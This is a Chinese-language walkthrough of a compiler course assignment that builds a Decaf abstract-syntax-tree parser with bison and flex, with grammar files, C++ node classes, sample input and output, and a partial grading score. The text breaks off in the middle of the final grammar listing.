您需要使用在 HW1 中构建的词法分析器,因此需要将 decaflex 中的词法分析器 decaflex.lex 复制到 /compilers-class-hw/decafast/answer

目录 /compilers-class-hw/decafast/answer 中存在这个作业的一个不完整的解决方案,本实验要求构造该方案的副本,因此要执行下列命令:

1
2
3
cp default.cc decafast.cc
cp default.lex decafast.lex
cp default.y decafast.y
  • decafast.cc:修改 #include "default.tab.h" 以替换为 #include "decafast.tab.h"
  • decafast.y:修改 #include "default.cc" 以替换为 #include "decafast.cc"
  • decafast.lex:仅将令牌模式定义从 HW1 中的 decaflex.lex 复制到 decafast.lex,不要从 main 复制任何内容,因为 decafast.y 中有一个新的 main 函数
  • PS:T_PACKAGE,T_LCB,T_RCB,T_ID 这4个 token 需使用 default.lex 中的默认值,忽略 T_WHITESPACE

通过运行以下命令构建可执行文件 decafast

1
make decafast

该实验提供了一个未完成案例 default.y

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
%{
#include <iostream>
#include <ostream>
#include <string>
#include <cstdlib>
#include "default-defs.h"

int yylex(void);
int yyerror(char *);

// print AST?
bool printAST = true;

#include "decafast.cc"

using namespace std;

%}

%define parse.error verbose

%union{ // 该样例程序只提供了两个可选类型:树节点,字符串
class decafAST *ast;
std::string *sval;
}

%token T_PACKAGE
%token T_LCB
%token T_RCB
%token <sval> T_ID

%type <ast> extern_list decafpackage

%%

start: program

program: extern_list decafpackage
{
ProgramAST *prog = new ProgramAST((decafStmtList *)$1, (PackageAST *)$2);
if (printAST) {
cout << getString(prog) << endl;
}
delete prog;
}

extern_list: /* extern_list can be empty */
{ decafStmtList *slist = new decafStmtList(); $$ = slist; }
;

decafpackage: T_PACKAGE T_ID T_LCB T_RCB
{ $$ = new PackageAST(*$2, new decafStmtList(), new decafStmtList()); delete $2; }
;

%%

int main() {
// parse the input and create the abstract syntax tree
int retval = yyparse();
return(retval >= 1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

decafast.cc 中提供了3个节点的类结构:

1
2
3
4
5
class decafAST {
public:
virtual ~decafAST() {}
virtual string str() { return string(""); }
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
class decafStmtList : public decafAST { /* 管理decaf语句 */
list<decafAST *> stmts;
public:
decafStmtList() {}
~decafStmtList() {
for (list<decafAST *>::iterator i = stmts.begin(); i != stmts.end(); i++) {
delete *i;
}
}
int size() { return stmts.size(); }
void push_front(decafAST *e) { stmts.push_front(e); }
void push_back(decafAST *e) { stmts.push_back(e); }
string str() { return commaList<class decafAST *>(stmts); }
};
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
class PackageAST : public decafAST { /* 管理decaf类 */
string Name;
decafStmtList *FieldDeclList;
decafStmtList *MethodDeclList;
public:
PackageAST(string name, decafStmtList *fieldlist, decafStmtList *methodlist)
: Name(name), FieldDeclList(fieldlist), MethodDeclList(methodlist) {}
~PackageAST() {
if (FieldDeclList != NULL) { delete FieldDeclList; }
if (MethodDeclList != NULL) { delete MethodDeclList; }
}
string str() {
return string("Package") + "(" + Name + "," + getString(FieldDeclList) + "," + getString(MethodDeclList) + ")";
}
};
1
2
3
4
5
6
7
8
9
10
11
class ProgramAST : public decafAST { /* 管理decaf程序 */
decafStmtList *ExternList;
PackageAST *PackageDef;
public:
ProgramAST(decafStmtList *externs, PackageAST *c) : ExternList(externs), PackageDef(c) {}
~ProgramAST() {
if (ExternList != NULL) { delete ExternList; }
if (PackageDef != NULL) { delete PackageDef; }
}
string str() { return string("Program") + "(" + getString(ExternList) + "," + getString(PackageDef) + ")"; }
};
  • 在分析的过程中需要为每一个可能得节点设置对应的类

最开始尝试的时候比较迷茫,不知道从何入手,于是先看一个程序提供的案例来进行分析:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
extern func print_int(int) void;
extern func read_int() int;

package Catalan {

func main() void {
print_int( cat( read_int() ) );
}

// factorial of n
func fact(n int) int {
if (n == 1) { return(1); }
else { return(n*fact(n-1)); }
}

// a choose b
func choose(a int, b int) int {
return( fact(a) / (fact(b)*fact(a-b)) );
}

// catalan number of n
func cat(n int) int {
return( choose(2*n,n)/(n+1) );
}

}
1
Program(ExternFunction(print_int,VoidType,VarDef(IntType)),ExternFunction(read_int,IntType,None),Package(Catalan,None,Method(main,VoidType,None,MethodBlock(None,MethodCall(print_int,MethodCall(cat,MethodCall(read_int,None))))),Method(fact,IntType,VarDef(n,IntType),MethodBlock(None,IfStmt(BinaryExpr(Eq,VariableExpr(n),NumberExpr(1)),Block(None,ReturnStmt(NumberExpr(1))),Block(None,ReturnStmt(BinaryExpr(Mult,VariableExpr(n),MethodCall(fact,BinaryExpr(Minus,VariableExpr(n),NumberExpr(1))))))))),Method(choose,IntType,VarDef(a,IntType),VarDef(b,IntType),MethodBlock(None,ReturnStmt(BinaryExpr(Div,MethodCall(fact,VariableExpr(a)),BinaryExpr(Mult,MethodCall(fact,VariableExpr(b)),MethodCall(fact,BinaryExpr(Minus,VariableExpr(a),VariableExpr(b)))))))),Method(cat,IntType,VarDef(n,IntType),MethodBlock(None,ReturnStmt(BinaryExpr(Div,MethodCall(choose,BinaryExpr(Mult,NumberExpr(2),VariableExpr(n)),VariableExpr(n)),BinaryExpr(Plus,VariableExpr(n),NumberExpr(1))))))))
  • 在 Program 中并列了3个节点:ExternFunction,ExternFunction,Package
  • 在每个节点中又详细描述了它的基础信息

模仿上述结构,可以写一个初版分析器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
%{
#include <iostream>
#include <ostream>
#include <string>
#include <cstdlib>
#include "default-defs.h"

int yylex(void);
int yyerror(char *);

// print AST?
bool printAST = true;

#include "decafast.cc"

using namespace std;

%}

%define parse.error verbose

%union{
class decafAST *ast;
std::string *sval;
}

%token T_PACKAGE T_EXTERN T_FUNC T_SEMICOLON T_COMMA T_CONTINUE T_FALSE T_TRUE T_VAR T_FOR T_NULL T_RETURN T_WHITESPACE
%token T_AND T_ASSIGN T_DIV T_DOT T_EQ T_RIGHTSHIFT T_GEQ T_GT T_LEFTSHIFT T_LEQ T_LT T_MINUS T_MOD T_MULT T_NEQ T_NOT T_OR T_PLUS
%token T_VOID T_INTTYPE T_BOOLTYPE T_STRINGTYPE
%token T_LCB T_RCB T_LPAREN T_RPAREN T_LSB T_RSB
%token T_COMMENT
%token T_BREAK T_ELSE T_IF T_WHILE
%token <sval> T_ID T_INTCONSTANT T_CHARCONSTANT T_STRINGCONSTANT

%type <ast> state_if state_while state_for state_break state_continue state_return exp assign method_call lvalue statements statement extern_list para_list_use para_usen para_use para_list_def block blockt var_decls var_decl method_decls method_decl decafpackage extern_def extern_defn extern_typen extern_type func_typen func_type method_type array_type type

%%

start: program

program: extern_list decafpackage{
ProgramAST *prog = new ProgramAST((decafStmtList *)$1, (PackageAST *)$2);
if (printAST) {
cout << getString(prog) << endl;
}
delete prog;
}
;

extern_list: extern_defn {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

extern_defn: extern_def extern_defn {
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

extern_def: T_EXTERN T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type T_SEMICOLON {
decafEXFuncDef *func = new decafEXFuncDef();
decafPara* para = (decafPara*)$5;
decafType * type = (decafType *)$7;
func->put_name($3);
func->put_type(type->get_type());
func->put_para((decafPara*)para);
$$ = func;
delete $3;
}
;

para_list_use: para_usen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

para_usen: para_use T_COMMA para_usen {
decafStmtList * para = (decafStmtList *)$3;
para->push_front($1);
$$ = para;
}
| para_use {
decafStmtList * para = new decafStmtList();
para->push_front($1);
$$ = para;
}
;

para_use: method_call { $$ = $1;}
| exp {$$ = $1;}
;


para_list_def: extern_typen {
$$ = $1;
}
| func_typen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

func_typen: func_type T_COMMA func_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| func_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

func_type: T_ID extern_type {
decafType* type = (decafType*)$2;
type->put_name($1);
$$ = type;
delete $1;
}
;

extern_typen: extern_type T_COMMA extern_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| extern_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

extern_type: T_STRINGTYPE { decafType* type = new decafType("StringType"); $$ = type;}
| type { decafType* type = (decafType* )$1; $$ = type;}
;

method_type: T_VOID { decafType* type = new decafType("VoidType"); $$ = type;}
| type { decafType* type = (decafType* )$1; $$ = type;}
;

array_type: T_LSB T_INTCONSTANT T_RSB type {

}
;

type: T_INTTYPE { decafType* type = new decafType("IntType"); $$ = type;}
| T_BOOLTYPE { decafType* type = new decafType("BoolType"); $$ = type;}
;

decafpackage: T_PACKAGE T_ID T_LCB var_decls method_decls T_RCB {
decafStmtList *field = (decafStmtList *)$4;
decafStmtList *method = (decafStmtList *)$5;
$$ = new PackageAST(*$2, field, method);
delete $2;
}
| T_PACKAGE T_ID T_LCB T_RCB {
$$ = new PackageAST(*$2, new decafStmtList(), new decafStmtList());
delete $2;
}
;

var_decls: var_decl var_decls{
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

var_decl: T_VAR T_ID type T_SEMICOLON {

}
| T_VAR T_ID array_type T_SEMICOLON {

}
| T_VAR T_ID type T_ASSIGN CONSTANT T_SEMICOLON {

}
;

CONSTANT : T_INTCONSTANT | T_CHARCONSTANT | T_STRINGCONSTANT { };

method_decls: method_decl method_decls{
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

method_decl: T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type block {
decafFuncDef *func = new decafFuncDef();
decafPara* para = (decafPara*)$4;
decafStmtList * block = (decafStmtList*)$7;
decafType * type = (decafType *)$6;
func->put_name($2);
func->put_type(type->get_type());
func->put_para(para);
func->put_block(block);
$$ = func;
delete $2;
}
;

blockt: T_LCB var_decls statements T_RCB {
decafStmtList *field = (decafStmtList *)$2;
decafStmtList *state = (decafStmtList *)$3;
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafStmtList *field = new decafStmtList();
decafStmtList *state = new decafStmtList();
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
;

block: T_LCB var_decls statements T_RCB {
decafStmtList *field = (decafStmtList *)$2;
decafStmtList *state = (decafStmtList *)$3;
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafStmtList *field = new decafStmtList();
decafStmtList *state = new decafStmtList();
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
;

statements: statement statements {
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

statement: blockt { $$ = $1; }
| assign T_SEMICOLON { $$ = $1; }
| method_call T_SEMICOLON { $$ = $1; }
| state_return T_SEMICOLON { $$ = $1; }
| state_if { $$ = $1; }
| state_while { $$ = $1; }
| state_for { $$ = $1; }
| state_break T_SEMICOLON { $$ = $1; }
| state_continue T_SEMICOLON { $$ = $1; }
| {}
;

state_if: T_IF T_LPAREN exp T_RPAREN blockt T_ELSE blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafBlock *else_block = (decafBlock *)$7;
decafIF *ifs = new decafIF(exp,if_block,else_block);
$$ = ifs;
}
| T_IF T_LPAREN exp T_RPAREN blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafIF *ifs = new decafIF(exp,if_block,NULL);
$$ = ifs;
}
;

state_while: {}
;

state_for: {}
;

state_break: {}
;

state_continue: {}
;

state_return: T_RETURN T_LPAREN exp T_RPAREN {
decafAllexp *exp = (decafAllexp *)$3;
decafReturn *ret = new decafReturn(exp);
$$ = ret;
}
;

assign: lvalue T_ASSIGN exp {

}
;

lvalue: T_ID { }
| T_ID T_LSB exp T_RSB { }
;

exp : T_ID { decafAllexp * exp = new decafAllexp(*$1,"VariableExpr"); $$ = exp; }
| T_INTCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; }
| T_CHARCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; }
| T_STRINGCONSTANT { decafAllexp * exp = new decafAllexp(*$1,"NumberExpr"); $$ = exp; }
| method_call { $$ = $1; }
| T_NOT exp { decafBinexp * exp = new decafBinexp("Not", (decafAllexp*)$2, NULL); $$ = exp; }
| T_MINUS exp { decafBinexp * exp = new decafBinexp("Minus", (decafAllexp*)$2, NULL); $$ = exp; }
| exp T_PLUS exp { decafBinexp * exp = new decafBinexp("Plus", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_MINUS exp { decafBinexp * exp = new decafBinexp("Minus", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_MULT exp { decafBinexp * exp = new decafBinexp("Mult", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_DIV exp { decafBinexp * exp = new decafBinexp("Div", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_MOD exp { decafBinexp * exp = new decafBinexp("Mod", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_LEFTSHIFT exp { decafBinexp * exp = new decafBinexp("Leftshift", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_RIGHTSHIFT exp { decafBinexp * exp = new decafBinexp("Rightshift", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_LEQ exp { decafBinexp * exp = new decafBinexp("Leq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_GEQ exp { decafBinexp * exp = new decafBinexp("Geq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_LT exp { decafBinexp * exp = new decafBinexp("Lt", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_GT exp { decafBinexp * exp = new decafBinexp("Gt", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_EQ exp { decafBinexp * exp = new decafBinexp("Eq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_NEQ exp { decafBinexp * exp = new decafBinexp("Neq", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_AND exp { decafBinexp * exp = new decafBinexp("And", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| exp T_OR exp { decafBinexp * exp = new decafBinexp("Or", (decafAllexp*)$1, (decafAllexp*)$3); $$ = exp; }
| T_LPAREN exp T_RPAREN { $$ = $2; }
| {}
;

method_call: T_ID T_LPAREN para_list_use T_RPAREN {
decafFunCall *call = new decafFunCall();
decafStmtList* para = (decafStmtList*)$3;
call->put_name($1);
call->put_para(para->get_para());
$$ = call;
delete $1;
}
;

%%


int main() {
// parse the input and create the abstract syntax tree
int retval = yyparse();
return(retval >= 1 ? EXIT_FAILURE : EXIT_SUCCESS);
}

上述语法分析器可以完美完成第一个样例,大体包含了对以下部分的处理:

  • 类定义,函数定义,函数调用,函数声明,表达式,IF语句,语句块

我这里说明几点需要注意的地方

函数参数列表的问题:我们不能提前确定传入函数的参数个数,因此需要利用循环(FOR 语句的处理也是同理)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
para_list_use: para_usen { 
$$ = $1;
}
| { /* 没有参数 */
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

para_usen: para_use T_COMMA para_usen { /* 剩余多个参数 */
decafStmtList * para = (decafStmtList *)$3;
para->push_front($1);
$$ = para;
}
| para_use { /* 剩余一个参数 */
decafStmtList * para = new decafStmtList();
para->push_front($1);
$$ = para;
}
;
  • 当处理 para_list_use 时,会有2种情况:
    • 无参数,不需要处理
    • 有参数,进入 para_usen,对于每一个 para_usen 有2种情况:
      • 剩余多个参数:将 para_use 压栈,继续匹配 para_usen 循环处理
      • 剩余一个参数:将 para_use 压栈

常量取值问题:对于常量需要再词法分析时将其字符串拷贝进来

1
2
3
{all_char}                 { yylval.sval = new string(yytext);return T_CHARCONSTANT; }
{all_str} { yylval.sval = new string(yytext);return T_STRINGCONSTANT; }
{decimal_num}|{hex_num} { yylval.sval = new string(yytext);return T_INTCONSTANT; }

注释处理问题:注释需要在词法分析时进行匹配(最好不要返回 token)

1
2
"//"[^\n]*  	             { }
"/*"([^\*]|(\*)*[^\*/])*(\*)*"*/" { }

得分结果:

1
2
3
4
➜  decafast git:(master) ✗ python3 check.py  
Correct(dev): 42 / 134
Score(dev): 42.00
Total Score: 42.00

已经匹配了部分样例,剩下的就是完善加调整,最后写一个完整分析器:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
%{
#include <iostream>
#include <ostream>
#include <string>
#include <cstdlib>
#include "default-defs.h"

int yylex(void);
int yyerror(char *);

// print AST?
bool printAST = true;

#include "decafast.cc"

using namespace std;

%}

%define parse.error verbose

%union{
class decafAST *ast;
std::string *sval;
}

%token T_PACKAGE T_EXTERN T_FUNC T_SEMICOLON T_COMMA T_CONTINUE T_FALSE T_TRUE T_VAR T_FOR T_NULL T_RETURN T_WHITESPACE
%token T_AND T_ASSIGN T_DIV T_DOT T_EQ T_RIGHTSHIFT T_GEQ T_GT T_LEFTSHIFT T_LEQ T_LT T_MINUS T_MOD T_MULT T_NEQ T_NOT T_OR T_PLUS
%token T_VOID T_INTTYPE T_BOOLTYPE T_STRINGTYPE
%token T_LCB T_RCB T_LPAREN T_RPAREN T_LSB T_RSB
%token T_COMMENT
%token T_BREAK T_ELSE T_IF T_WHILE
%token <sval> T_ID T_INTCONSTANT T_CHARCONSTANT T_STRINGCONSTANT

%type <ast> state_if state_while lvalues state_for state_break state_continue state_return exp assign assigns assignss method_call lvalue statements statement extern_list para_list_use para_usen para_use para_list_def block blockt var_decls var_decl method_decls method_decl decafpackage var_declp var_declps extern_def extern_defn extern_typen extern_type func_typen func_type method_type type

%right T_ASSIGN
%left T_OR
%left T_AND
%left T_EQ T_NEQ T_LT T_GT T_GEQ T_LEQ
%left T_PLUS T_MINUS
%left T_MULT T_DIV T_MOD T_RIGHTSHIFT T_LEFTSHIFT
%right T_NOT
%right T_UMINUS
%right T_LPAREN
%left T_RPAREN
%nonassoc T_IF
%nonassoc T_ELSE

%%

start: program

program: extern_list decafpackage{
ProgramAST *prog = new ProgramAST((decafStmtList *)$1, (PackageAST *)$2);
if (printAST) {
cout << getString(prog) << endl;
}
delete prog;
}
;

extern_list: extern_defn {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

extern_defn: extern_def extern_defn {
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

extern_def: T_EXTERN T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type T_SEMICOLON {
decafEXFuncDef *func = new decafEXFuncDef();
decafPara* para = (decafPara*)$5;
decafType * type = (decafType *)$7;
func->put_name($3);
func->put_type(type->get_type());
func->put_para((decafPara*)para);
$$ = func;
delete $3;
}
;

para_list_use: para_usen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

para_usen: para_use T_COMMA para_usen {
decafStmtList * para = (decafStmtList *)$3;
para->push_front($1);
$$ = para;
}
| para_use {
decafStmtList * para = new decafStmtList();
para->push_front($1);
$$ = para;
}
;

para_use: method_call { $$ = $1;}
| exp {$$ = $1;}
;


para_list_def: extern_typen {
$$ = $1;
}
| func_typen {
$$ = $1;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

func_typen: func_type T_COMMA func_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| func_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

func_type: T_ID extern_type {
decafType* type = (decafType*)$2;
type->put_name(*$1);
$$ = type;
delete $1;
}
;

extern_typen: extern_type T_COMMA extern_typen {
decafPara * para = (decafPara *)$3;
para->push_front((decafType *)$1);
$$ = para;
}
| extern_type {
decafPara * para = new decafPara();
para->push_front((decafType*)$1);
$$ = para;
}
;

extern_type: T_STRINGTYPE { decafType* type = new decafType("StringType"); $$ = type;}
| type { decafType* type = (decafType* )$1; $$ = type;}
;

method_type: T_VOID { decafType* type = new decafType("VoidType"); $$ = type;}
| type { decafType* type = (decafType* )$1; $$ = type;}
;

type: T_INTTYPE { decafType* type = new decafType("IntType"); $$ = type;}
| T_BOOLTYPE { decafType* type = new decafType("BoolType"); $$ = type;}
;

decafpackage: T_PACKAGE T_ID T_LCB var_declps method_decls T_RCB {
decafVarList *field = (decafVarList *)$4;
decafStmtList *method = (decafStmtList *)$5;
$$ = new PackageAST(*$2, field, method);
delete $2;
}
| T_PACKAGE T_ID T_LCB T_RCB {
$$ = new PackageAST(*$2, new decafVarList(), new decafStmtList());
delete $2;
}
;

var_declps: var_declp var_declps {
decafVarList *slist = (decafVarList *)$2;
slist->cat_front((decafVarList *)$1);
$$ = slist;
}
| {
decafVarList *slist = new decafVarList();
$$ = slist;
}
;

var_declp: T_VAR lvalues type T_SEMICOLON {
decafType * type = (decafType *)$3;
decafVarList * list = (decafVarList *)$2;
list->put_types(type->get_type());
list->put_kinds("Scalar");
$$ = list;
}
| T_VAR lvalue type T_ASSIGN exp T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
decafAllexp * exp = (decafAllexp *)$5;
var->put_kind("Scalar");
var->put_type(type->get_type());
var->put_exp(exp);
list->push_front(var);
$$ = list;
}
| T_VAR lvalue type T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
var->put_kind("Scalar");
var->put_type(type->get_type());
list->push_front(var);
$$ = list;
}
;

var_decls: var_decl var_decls {
decafVarList *slist = (decafVarList *)$2;
slist->cat_front((decafVarList *)$1);
$$ = slist;
}
| {
decafVarList *slist = new decafVarList();
$$ = slist;
}
;

var_decl: T_VAR lvalue type T_ASSIGN exp T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
decafAllexp * exp = (decafAllexp *)$5;
var->put_type(type->get_type());
var->put_exp(exp);
list->push_front(var);
$$ = list;
}
| T_VAR lvalues type T_SEMICOLON {
decafType * type = (decafType *)$3;
decafVarList * list = (decafVarList *)$2;
list->put_types(type->get_type());
$$ = list;
}
| T_VAR lvalue type T_SEMICOLON {
decafVarList * list = new decafVarList();
decafType * type = (decafType *)$3;
decafVar * var = (decafVar *)$2;
var->put_type(type->get_type());
list->push_front(var);
$$ = list;
}
;

lvalues: lvalue T_COMMA lvalues {
decafVar* var = (decafVar*)$1;
decafVarList * list = (decafVarList*)$3;
list->push_back(var);
$$=list;
}
| lvalue {
decafVar* var = (decafVar*)$1;
decafVarList * list = new decafVarList();
list->push_back(var);
$$=list;
}
;

lvalue: T_ID { decafVar* var = new decafVar(*$1) ;$$ = var; delete $1;}
| T_ID T_LSB exp T_RSB {
decafVar* var = new decafVar(*$1) ;
decafAllexp* arr = (decafAllexp *)$3;
var->put_arr(arr);
var->put_kind("Array("+arr->get_name()+")");
$$ = var;
delete $1;
}
;

CONSTANT : T_INTCONSTANT | T_CHARCONSTANT | T_STRINGCONSTANT { };

method_decls: method_decl method_decls{
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

method_decl: T_FUNC T_ID T_LPAREN para_list_def T_RPAREN method_type block {
decafFuncDef *func = new decafFuncDef();
decafPara* para = (decafPara*)$4;
decafStmtList * block = (decafStmtList*)$7;
decafType * type = (decafType *)$6;
func->put_name($2);
func->put_type(type->get_type());
func->put_para(para);
func->put_block(block);
$$ = func;
delete $2;
}
;

blockt: T_LCB var_decls statements T_RCB {
decafStmtList *field = (decafStmtList *)$2;
decafStmtList *state = (decafStmtList *)$3;
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafStmtList *field = new decafStmtList();
decafStmtList *state = new decafStmtList();
decafBlock *block = new decafBlock("Block",field,state);
$$ = block;
}
;

block: T_LCB var_decls statements T_RCB {
decafStmtList *field = (decafStmtList *)$2;
decafStmtList *state = (decafStmtList *)$3;
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
| T_LCB T_RCB {
decafStmtList *field = new decafStmtList();
decafStmtList *state = new decafStmtList();
decafBlock *block = new decafBlock("MethodBlock",field,state);
$$ = block;
}
;

statements: statement statements {
decafStmtList *slist = (decafStmtList *)$2;
slist->push_front((decafAST *)$1);
$$ = slist;
}
| {
decafStmtList *slist = new decafStmtList();
$$ = slist;
}
;

statement: blockt { $$ = $1; }
| assign T_SEMICOLON { $$ = $1; }
| method_call T_SEMICOLON { $$ = $1; }
| state_return T_SEMICOLON { $$ = $1; }
| state_if { $$ = $1; }
| state_while { $$ = $1; }
| state_for { $$ = $1; }
| state_break T_SEMICOLON { $$ = $1; }
| state_continue T_SEMICOLON { $$ = $1; }
| {}
;

state_if: T_IF T_LPAREN exp T_RPAREN blockt T_ELSE blockt {
decafAllexp *exp = (decafAllexp *)$3;
decafBlock *if_block = (decafBlock *)$5;
decafBlock *else_block = (decafBlock *)$7;
decafIF *ifs = new decafIF(exp,if_block,else_block);
$$ = ifs;
}
| T_IF T_LPAREN exp T_RPAREN blockt {
